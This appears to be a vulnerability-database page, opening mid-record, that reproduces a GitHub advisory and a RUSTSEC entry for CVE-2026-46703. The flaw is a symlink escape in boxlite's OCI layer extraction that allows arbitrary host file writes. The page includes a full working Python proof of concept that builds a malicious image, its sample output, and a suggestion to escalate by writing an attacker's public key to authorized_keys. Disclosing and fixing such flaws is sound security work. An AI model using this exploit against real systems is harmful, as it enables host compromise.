\u0026target)?;  // line 327 \u2014 target is NOT validated\n}\n```\n\n**Issue:** The symlink\u0027s `full_path` (the link itself) is sanitized by `normalize_entry_path` to stay within `dest`. However, the `target` (what the symlink points to) is never validated. An entry with path `usr` and link target `/etc` creates `{dest}/usr -\u003e /etc`, a symlink pointing outside the extraction root. There is no check that `target` stays within `dest`, is relative, or doesn\u0027t escape the container root.\n\n3. Symlink Target Written Verbatim\n\n**File:** `boxlite/src/images/archive/tar.rs` **Function:** `create_symlink()` (line 747) **Code:**\n\n```rust\nfn create_symlink(path: \u0026Path, target: \u0026Path) -\u003e BoxliteResult\u003c()\u003e {\n    std::os::unix::fs::symlink(target, path).map_err(|e| { /* ... */ })\n}\n```\n\n**Issue:** `std::os::unix::fs::symlink` is an `lstat`-level operation \u2014 it creates the symlink with the provided target string verbatim, no matter what it contains. If `target` is `/etc`, the link records `/etc` as the target. No containment check.\n\n4. ensure_parent_dirs Deliberately Follows and Preserves Escape Symlinks\n\n**File:** `boxlite/src/images/archive/tar.rs` **Function:** `ensure_parent_dirs()` (line 457) **Code:**\n\n```rust\nOk(m) if m.file_type().is_symlink() =\u003e {\n    // Check if symlink points to a directory\n    match fs::metadata(current_check) {  // follows symlink\n        Ok(target_m) if target_m.is_dir() =\u003e {\n            trace!(\"Preserving symlink that points to directory: ...\");\n            break;  // line 516 \u2014 stop, keep the symlink, treat as valid parent\n        }\n```\n\n**Issue:** When the next tar entry has path `usr/passwd` and the code calls `ensure_parent_dirs(\"{dest}/usr/passwd\", dest)`, it walks up to `{dest}/usr`, finds it is a symlink pointing to a directory (e.g., `/etc`), and explicitly **breaks** the loop to preserve it \u2014 treating the out-of-root symlink as a valid, navigable parent. The `create_dir_all` call is then skipped for this path. The caller proceeds to open and write `{dest}/usr/passwd`, which the kernel resolves through the symlink to `/etc/passwd`.\n\n5. File Written Through Escaped Symlink\n\n**File:** `boxlite/src/images/archive/tar.rs` **Function:** `create_regular_file()` (line 715) **Code:**\n\n```rust\nfn create_regular_file\u003cR: Read\u003e(entry: \u0026mut Entry\u003cR\u003e, path: \u0026Path, mode: u32) -\u003e BoxliteResult\u003c()\u003e {\n    let mut file = OpenOptions::new()\n        .write(true).create(true).truncate(true).mode(mode)\n        .open(path)   // path = \"{dest}/usr/passwd\" which kernel follows to \"/etc/passwd\"\n        .map_err(|e| { /* ... */ })?;\n    io::copy(entry, \u0026mut file)?;   // attacker-controlled content written to /etc/passwd\n    Ok(())\n}\n```\n\n**Issue:** `OpenOptions::open()` follows symlinks in path components by default. The kernel resolves `{dest}/usr/passwd` \u2192 `{dest}/usr` is a symlink to `/etc` \u2192 file opened at `/etc/passwd`. Attacker-controlled tar entry content is copied there verbatim.\n\n\n\nAs seen from the code, when a tar entry is a symlink, Boxlite\u0027s security checks are insufficient. An attacker can exploit this vulnerability to achieve arbitrary file write once a user loads a maliciously crafted image. The write permission is consistent with the process privilege running the Boxlite service, which is commonly root on Linux. The attacker can further leverage this capability to achieve remote code execution, such as writing the attacker\u0027s public key into the host\u0027s authorized_keys.\n\n\n\n#### PoC\n\n1. Install Boxlite following the official tutorial.\n\n2. Run the following Python script:\n\n   ```python\n   #!/usr/bin/env python3\n   \"\"\"\n   PoC: BoxLite OCI Layer Extraction Symlink Escape\n   =================================================\n   \n   Vulnerability: boxlite/src/images/archive/tar.rs \u2014 extract_layer_tarball_streaming()\n   Type:          CWE-61 / CAPEC-132 \u2014 Symlink Following during tar extraction\n   \n   Attack:\n     OCI images consist of layer tarballs extracted on the host to build the ext4\n     base image. If the extractor follows a symlink without verifying the resolved\n     path stays within the extraction root, an attacker can craft a tar like:\n   \n       [1] SYMLINK  escape  -\u003e  /tmp          (points to host /tmp)\n       [2] FILE     escape/poc/pwned.txt       (resolves via [1] to /tmp/poc/pwned.txt)\n   \n     KVM hardware isolation is irrelevant here \u2014 tar extraction happens in the host\n     process before the VM ever starts.\n   \n   Target write: /tmp/boxlite_host_escape/pwned.txt\n   Expected isolation boundary: boxlite internal staging dir under /tmp\n   \"\"\"\n   \n   import asyncio\n   import hashlib\n   import io\n   import json\n   import os\n   import shutil\n   import tarfile\n   import time\n   \n   TARGET_FILE = \"/tmp/boxlite_host_escape/pwned.txt\"\n   OCI_LAYOUT_DIR = \"/tmp/malicious_oci_layout\"\n   \n   \n   # \u2500\u2500 Helpers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n   \n   \n   def sha256hex(data: bytes) -\u003e str:\n       return hashlib.sha256(data).hexdigest()\n   \n   \n   def add_entry(\n       tf: tarfile.TarFile,\n       name: str,\n       type_: bytes,\n       linkname: str = \"\",\n       data: bytes = b\"\",\n       mode: int = 0o644,\n   ):\n       info = tarfile.TarInfo(name=name)\n       info.type = type_\n       info.linkname = linkname\n       info.size = len(data)\n       info.mode = mode\n       info.mtime = int(time.time())\n       tf.addfile(info, io.BytesIO(data) if data else None)\n   \n   \n   # \u2500\u2500 Step 1: Build malicious OCI layer tar \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n   \n   \n   def build_layer_tar() -\u003e bytes:\n       \"\"\"\n       Tar entries (order matters):\n         [1] SYMLINK  escape            -\u003e  /tmp\n         [2] DIR      escape/boxlite_host_escape/     (resolves to /tmp/boxlite_host_escape/)\n         [3] FILE     escape/boxlite_host_escape/pwned.txt  (resolves to /tmp/\u2026/pwned.txt)\n         [4] FILE     etc/os-release    (legitimate-looking decoy entries)\n       \"\"\"\n       payload = (\n           \"===== BOXLITE SYMLINK ESCAPE: HOST FILESYSTEM WRITE =====\\n\"\n           f\"Written at: {time.strftime(\u0027%Y-%m-%d %H:%M:%S\u0027)}\\n\"\n           f\"Target: {TARGET_FILE}\\n\"\n           \"========================================================\\n\"\n       ).encode()\n   \n       buf = io.BytesIO()\n       with tarfile.open(fileobj=buf, mode=\"w\") as tf:\n           add_entry(tf, \"escape\", tarfile.SYMTYPE, linkname=\"/tmp\", mode=0o777)\n           add_entry(tf, \"escape/boxlite_host_escape\", tarfile.DIRTYPE, mode=0o755)\n           add_entry(\n               tf, \"escape/boxlite_host_escape/pwned.txt\", tarfile.REGTYPE, data=payload\n           )\n           add_entry(\n               tf,\n               \"etc/os-release\",\n               tarfile.REGTYPE,\n               data=b\"ID=alpine\\nVERSION_ID=3.19.0\\n\",\n           )\n       return buf.getvalue()\n   \n   \n   # \u2500\u2500 Step 2: Build OCI image layout \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n   \n   \n   def build_oci_layout(out_dir: str) -\u003e None:\n       blobs = os.path.join(out_dir, \"blobs\", \"sha256\")\n       os.makedirs(blobs, exist_ok=True)\n   \n       def write_blob(data: bytes) -\u003e tuple[str, int]:\n           dgst = sha256hex(data)\n           with open(os.path.join(blobs, dgst), \"wb\") as f:\n               f.write(data)\n           return dgst, len(data)\n   \n       layer_bytes = build_layer_tar()\n       layer_dgst, layer_sz = write_blob(layer_bytes)\n   \n       config_bytes = json.dumps(\n           {\n               \"architecture\": \"amd64\",\n               \"os\": \"linux\",\n               \"config\": {\"Cmd\": [\"/bin/sh\"]},\n               \"rootfs\": {\"type\": \"layers\", \"diff_ids\": [f\"sha256:{layer_dgst}\"]},\n           }\n       ).encode()\n       cfg_dgst, cfg_sz = write_blob(config_bytes)\n   \n       manifest_bytes = json.dumps(\n           {\n               \"schemaVersion\": 2,\n               \"mediaType\": \"application/vnd.oci.image.manifest.v1+json\",\n               \"config\": {\n                   \"mediaType\": \"application/vnd.oci.image.config.v1+json\",\n                   \"digest\": f\"sha256:{cfg_dgst}\",\n                   \"size\": cfg_sz,\n               },\n               \"layers\": [\n                   {\n                       \"mediaType\": \"application/vnd.oci.image.layer.v1.tar\",\n                       \"digest\": f\"sha256:{layer_dgst}\",\n                       \"size\": layer_sz,\n                   }\n               ],\n           }\n       ).encode()\n       mf_dgst, mf_sz = write_blob(manifest_bytes)\n   \n       with open(os.path.join(out_dir, \"index.json\"), \"w\") as f:\n           json.dump(\n               {\n                   \"schemaVersion\": 2,\n                   \"manifests\": [\n                       {\n                           \"mediaType\": \"application/vnd.oci.image.manifest.v1+json\",\n                           \"digest\": f\"sha256:{mf_dgst}\",\n                           \"size\": mf_sz,\n                           \"annotations\": {\"org.opencontainers.image.ref.name\": \"latest\"},\n                       }\n                   ],\n               },\n               f,\n           )\n   \n       with open(os.path.join(out_dir, \"oci-layout\"), \"w\") as f:\n           json.dump({\"imageLayoutVersion\": \"1.0.0\"}, f)\n   \n       print(f\"  layer    sha256:{layer_dgst[:16]}\u2026  ({layer_sz} B)\")\n       print(f\"  config   sha256:{cfg_dgst[:16]}\u2026  ({cfg_sz} B)\")\n       print(f\"  manifest sha256:{mf_dgst[:16]}\u2026  ({mf_sz} B)\")\n   \n   \n   # \u2500\u2500 Main \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n   \n   \n   async def main():\n       print(\"=\" * 60)\n       print(\"  PoC: BoxLite OCI Layer Extraction Symlink Escape\")\n       print(\"=\" * 60)\n   \n       # Clean up previous run artifacts\n       for path in [TARGET_FILE, \"/tmp/boxlite_host_escape\", OCI_LAYOUT_DIR]:\n           if os.path.isfile(path):\n               os.remove(path)\n           elif os.path.isdir(path):\n               shutil.rmtree(path)\n   \n       # [1] Build malicious OCI image\n       print(f\"\\n[1] Building malicious OCI image \u2192 {OCI_LAYOUT_DIR}\")\n       build_oci_layout(OCI_LAYOUT_DIR)\n   \n       # [2] Show crafted tar entries\n       print(\"\\n[2] Malicious layer tar entries:\")\n       with open(os.path.join(OCI_LAYOUT_DIR, \"index.json\")) as f:\n           idx = json.load(f)\n       mf_dgst = idx[\"manifests\"][0][\"digest\"].split(\":\")[1]\n       with open(os.path.join(OCI_LAYOUT_DIR, \"blobs\", \"sha256\", mf_dgst)) as f:\n           mf = json.load(f)\n       lyr_dgst = mf[\"layers\"][0][\"digest\"].split(\":\")[1]\n       lyr_data = open(\n           os.path.join(OCI_LAYOUT_DIR, \"blobs\", \"sha256\", lyr_dgst), \"rb\"\n       ).read()\n       with tarfile.open(fileobj=io.BytesIO(lyr_data)) as tf:\n           for m in tf.getmembers():\n               tstr = {\n                   tarfile.REGTYPE: \"FILE   \",\n                   tarfile.SYMTYPE: \"SYMLINK\",\n                   tarfile.DIRTYPE: \"DIR    \",\n               }.get(m.type, f\"?{m.type}   \")\n               suffix = f\" -\u003e {m.linkname}\" if m.issym() else \"\"\n               print(f\"    {tstr}  {m.name}{suffix}\")\n   \n       # [3] Confirm target absent before exploit\n       print(f\"\\n[3] Pre-exploit \u2014 target exists? {os.path.exists(TARGET_FILE)}\")\n   \n       # [4] Trigger extraction (vulnerability fires before VM starts)\n       print(f\"\\n[4] Loading malicious image via boxlite.SimpleBox(rootfs_path=\u2026)\")\n       import boxlite\n   \n       try:\n           async with boxlite.SimpleBox(rootfs_path=OCI_LAYOUT_DIR) as box:\n               r = await box.exec(\"sh\", \"-c\", \"echo ok\")\n               print(f\"    VM stdout: {r.stdout.strip()}\")\n       except Exception as e:\n           # Box may fail to start (incomplete rootfs) \u2014 that\u0027s fine;\n           # the symlink escape occurs during layer extraction, before VM launch.\n           print(f\"    Box error (expected): {type(e).__name__}: {e}\")\n   \n       # [5] Verify host write\n       print(f\"\\n[5] Post-exploit \u2014 target exists? {os.path.exists(TARGET_FILE)}\")\n       if os.path.exists(TARGET_FILE):\n           print(f\"\\n  VULNERABLE \u2014 host file written successfully!\")\n           print(f\"  Path: {TARGET_FILE}\")\n           print(open(TARGET_FILE).read())\n       else:\n           print(\"\\n  NOT VULNERABLE (or already patched)\")\n   \n   \n   if __name__ == \"__main__\":\n       asyncio.run(main())\n   ```\n\n   This script constructs a malicious OCI image and passes it to the SimpleBox function via rootfs_path to create a container. In the malicious image, a symlink is first created pointing `escape` to `/tmp`, and then files are written under `escape`, thereby achieving file writes to the root filesystem.\n\n   Sample output:\n\n   ```\n   $ python3 poc_symlink_escape.py\n   ============================================================\n     PoC: BoxLite OCI Layer Extraction Symlink Escape\n   ============================================================\n   \n   [1] Building malicious OCI image \u2192 /tmp/malicious_oci_layout\n     layer    sha256:a1e8b4de11d64fce\u2026  (10240 B)\n     config   sha256:8e245c2c65565998\u2026  (191 B)\n     manifest sha256:2dad6671e78d8093\u2026  (415 B)\n   \n   [2] Malicious layer tar entries:\n       SYMLINK  escape -\u003e /tmp\n       DIR      escape/boxlite_host_escape\n       FILE     escape/boxlite_host_escape/pwned.txt\n       FILE     etc/os-release\n   \n   [3] Pre-exploit \u2014 target exists? False\n   \n   [4] Loading malicious image via boxlite.SimpleBox(rootfs_path=\u2026)\n       Box error (expected): RuntimeError: internal error: Container init failed: Failed to start container: internal error: Failed to create container b673b4e3400c71bd72464c98610c952e2164f70f946873b82adf3e6212851d54 at bundle /run/boxlite/containers/b673b4e3400c71bd72464c98610c952e2164f70f946873b82adf3e6212851d54: failed to create container: exec process failed with error error in executing process : PATH environment variable is not set\n   \n   [5] Post-exploit \u2014 target exists? True\n   \n     VULNERABLE \u2014 host file written successfully!\n     Path: /tmp/boxlite_host_escape/pwned.txt\n   ===== BOXLITE SYMLINK ESCAPE: HOST FILESYSTEM WRITE =====\n   Written at: ...\n   Target: /tmp/boxlite_host_escape/pwned.txt\n   ========================================================\n   ```\n\n   \n\n#### Impact\n\nAn attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host.\n\n\n\n#### Score\n\nSeverity: Critical, Score: 9.7, rationale as follows:\n\n- AV:N \u2014 The attacker can distribute the malicious image over the network, tricking users into pulling and using it\n- AC:L \u2014 This is a logic vulnerability that requires no complex exploitation\n- PR:N \u2014 The attacker does not need any additional privileges to exploit this vulnerability\n- UI:R \u2014 The attacker needs to trick the victim into using the maliciously crafted image\n- S:C \u2014 The attacker can leverage the vulnerability to achieve arbitrary command execution on the host, extending the impact to the host operating system and crossing the security boundary\n- C:H/I:H/A:H \u2014 The attacker can leverage the vulnerability to gain RCE capability on the host, posing a significant threat to confidentiality, integrity, and availability\n\n\n\n#### Credit\n\nThis vulnerability was discovered by:\n\n- XlabAI Team of Tencent Xuanwu Lab\n- Atuin Automated Vulnerability Discovery Engine\n\nIf there are any questions regarding the vulnerability details, please feel free to reach out to BoxLite for further discussion by emailing xlabai@tencent.com.\n\n\n\n#### Note\n\nNote that Boxlite follows the industry-standard **90+30 disclosure policy** (Reference: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html). This means that BoxLite reserves the right to disclose the details of the vulnerability 30 days after the fix has been implemented.",
  "id": "GHSA-f396-4rp4-7v2j",
  "modified": "2026-06-11T14:07:28Z",
  "published": "2026-05-21T21:54:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46703"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/boxlite-ai/boxlite"
    },
    {
      "type": "WEB",
      "url": "https://github.com/boxlite-ai/boxlite/releases/tag/v0.9.0"
    },
    {
      "type": "WEB",
      "url": "https://rustsec.org/advisories/RUSTSEC-2026-0148.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Boxlite: Path Traversal Vulnerability Leads to Arbitrary File Write on the Host"
}

rustsec-2026-0148

Vulnerability from osv_rustsec

Published

2026-05-16 12:00

Modified

2026-05-20 10:00

Summary

OCI layer symlink escape → arbitrary host write

Details

Affected versions of boxlite extract OCI image layer tarballs without fully containing path resolution to the extraction root. A crafted layer containing a symlink whose target is an absolute on-host path (e.g. escape -> /tmp) followed by a file entry that resolves through that symlink (e.g. escape/<path>/pwned.txt) caused the extractor to write the payload to the host filesystem outside the intended rootfs directory.

The fix in v0.9.0 routes every destructive filesystem operation through a SafeRoot handle (openat2(RESOLVE_IN_ROOT) on Linux, lexical fallback elsewhere) so that no tar entry can resolve outside the extraction root, even with adversarial symlinks placed by earlier entries in the same layer.

This is a container-escape during image extraction, exploitable by any user who pulls or loads a malicious OCI image — including via SimpleBox(rootfs_path=...) from an untrusted local layout.

Severity

10.0 (Critical)


                    
                      CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

References

URL

Type

	https://crates.io/crates/boxlite	PACKAGE
	https://rustsec.org/advisories/RUSTSEC-2026-0148.html	ADVISORY
	https://github.com/boxlite-ai/boxlite/security/ad…	ADVISORY
	https://github.com/boxlite-ai/boxlite/pull/429	WEB
	https://github.com/boxlite-ai/boxlite/pull/446	WEB
	https://github.com/boxlite-ai/boxlite/pull/461	WEB

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "categories": [
          "privilege-escalation",
          "file-disclosure"
        ],
        "cvss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "informational": null
      },
      "ecosystem_specific": {
        "affected_functions": null,
        "affects": {
          "arch": [],
          "functions": [],
          "os": []
        }
      },
      "package": {
        "ecosystem": "crates.io",
        "name": "boxlite",
        "purl": "pkg:cargo/boxlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0-0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "SEMVER"
        }
      ],
      "versions": []
    }
  ],
  "aliases": [
    "CVE-2026-46703",
    "GHSA-f396-4rp4-7v2j"
  ],
  "database_specific": {
    "license": "CC0-1.0"
  },
  "details": "Affected versions of `boxlite` extract OCI image layer tarballs without\nfully containing path resolution to the extraction root. A crafted layer\ncontaining a symlink whose target is an absolute on-host path (e.g.\n`escape -\u003e /tmp`) followed by a file entry that resolves through that\nsymlink (e.g. `escape/\u003cpath\u003e/pwned.txt`) caused the extractor to write\nthe payload to the host filesystem outside the intended rootfs directory.\n\nThe fix in v0.9.0 routes every destructive filesystem operation through a\n`SafeRoot` handle (`openat2(RESOLVE_IN_ROOT)` on Linux, lexical fallback\nelsewhere) so that no tar entry can resolve outside the extraction root,\neven with adversarial symlinks placed by earlier entries in the same\nlayer.\n\nThis is a container-escape during image extraction, exploitable by any\nuser who pulls or loads a malicious OCI image \u2014 including via\n`SimpleBox(rootfs_path=...)` from an untrusted local layout.",
  "id": "RUSTSEC-2026-0148",
  "modified": "2026-05-20T10:00:58Z",
  "published": "2026-05-16T12:00:00Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://crates.io/crates/boxlite"
    },
    {
      "type": "ADVISORY",
      "url": "https://rustsec.org/advisories/RUSTSEC-2026-0148.html"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j"
    },
    {
      "type": "WEB",
      "url": "https://github.com/boxlite-ai/boxlite/pull/429"
    },
    {
      "type": "WEB",
      "url": "https://github.com/boxlite-ai/boxlite/pull/446"
    },
    {
      "type": "WEB",
      "url": "https://github.com/boxlite-ai/boxlite/pull/461"
    }
  ],
  "related": [],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OCI layer symlink escape \u2192 arbitrary host write"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-46703 (GCVE-0-2026-46703)

FKIE_CVE-2026-46703

GHSA-F396-4RP4-7V2J

Summary

Details

PoC

Impact

Score

Credit

Note

rustsec-2026-0148

Vulnerability from osv_rustsec

Tags

Sightings

Nomenclature